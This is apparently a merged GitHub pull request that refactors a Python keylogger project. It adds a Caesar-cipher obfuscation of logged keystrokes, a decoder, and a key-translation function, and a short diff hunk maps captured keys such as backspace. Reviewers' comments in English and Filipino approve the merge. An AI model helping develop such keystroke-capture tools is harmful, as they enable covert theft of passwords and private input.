### PR TITLE
Code Quality: Refactored code

### PR DESCRIPTION
**Pull request by verdaderoken**
## Changes
- Updated formatting (using black)
- Added modified version of Caesar cipher
- Added docstrings
- Added configuration
- Added `translate_key()`, `cipher_string()`, and `decode_logged_keys()`
- Moved global statements to `main()`
- Replaced some variables with headers
- Removed duplicate variables
- Removed unused imports

## Tests

Test string: `This is a test typing`
Ciphered text;
image

Decoded text:
image

### CODE REVIEW

File: Keylogger/keylogger.py [hunk 1]
```diff
@@ -1,115 +1,213 @@
...
+        Args:
+            key (Key): The key to be translated
+        """
+        match key:
+            case Key.enter:
+                return "\n"
+            case Key.space:
+                return " "
+            case Key.backspace:
+                return "←"  # ? <- Needs review
```
Comment (verdaderoken) [inline Keylogger/keylogger.py:114]: Goods lang kaya 'tong substitution ng backspace to `←`? O wag na i-track yung backspace? HAHAHAHA

Comment (JerwellSavella) [reply Keylogger/keylogger.py:114]: Goods 'to bro, mas ok kung may indication when the user used the backspace key din, Thanks thanks!

File: Keylogger/cipher.py
Comment (JerwellSavella) [inline Keylogger/cipher.py:1]: Thanks for adding this function Master kenjie!

**Review by JerwellSavella — COMMENTED** [review]
Thanks Master Kenjie! I'll approve the pull request to Merge it sa main branch, Thanks for submitting a PR! Let's add more functionalities here in the future :)

**Pull request merged**